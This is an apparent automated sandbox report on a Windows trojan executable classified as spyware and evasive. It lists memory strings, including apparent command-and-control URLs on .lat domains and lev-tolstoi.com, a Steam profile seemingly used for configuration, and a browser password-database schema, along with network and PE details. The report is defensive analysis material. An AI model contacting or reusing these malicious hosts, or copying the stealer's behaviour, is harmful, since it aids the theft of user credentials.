Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://energyaffai.lat/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://energyaffai.lat:443/api=
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grannyejh.lat:443/api$
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/$
Source: jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496634027.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/(
Source: jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/;#
Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/X236
Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427112957.0000000005DF2000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api8
Source: jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/cE
Source: jSFUzuYPG9.exe, 00000000.00000003.1474837277.0000000005DEB000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474953402.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/h
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/x
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.s7
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacebudi.lat:443/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.nP
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Per
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat/d
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sustainskelet.lat:443/apis
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sweepyribs.lat:443/api
Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: jSFUzuYPG9.exe	Static PE information: section name:
Source: jSFUzuYPG9.exe	Static PE information: section name: .rsrc
Source: jSFUzuYPG9.exe	Static PE information: section name: .idata

Detected potential crypto function

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Code function: 0_3_016AF430

0_3_016AF430

One or more processes crash

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140

Uses 32bit PE files

Source: jSFUzuYPG9.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jSFUzuYPG9.exe

Static PE information: Section: ZLIB complexity 0.9974114404965754

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/4

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7428

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f51efc0a-74d9-4ec7-9c39-26d8e1893b37

Jump to behavior

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jSFUzuYPG9.exe, 00000000.00000003.1403414219.0000000005E1A000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1428084440.0000000005E11000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403726937.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427969651.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: jSFUzuYPG9.exe	ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe	Virustotal: Detection: 50%

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

File read: C:\Users\user\Desktop\jSFUzuYPG9.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jSFUzuYPG9.exe "C:\Users\user\Desktop\jSFUzuYPG9.exe"
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Section loaded: winhttp.dll	Jump to behavior
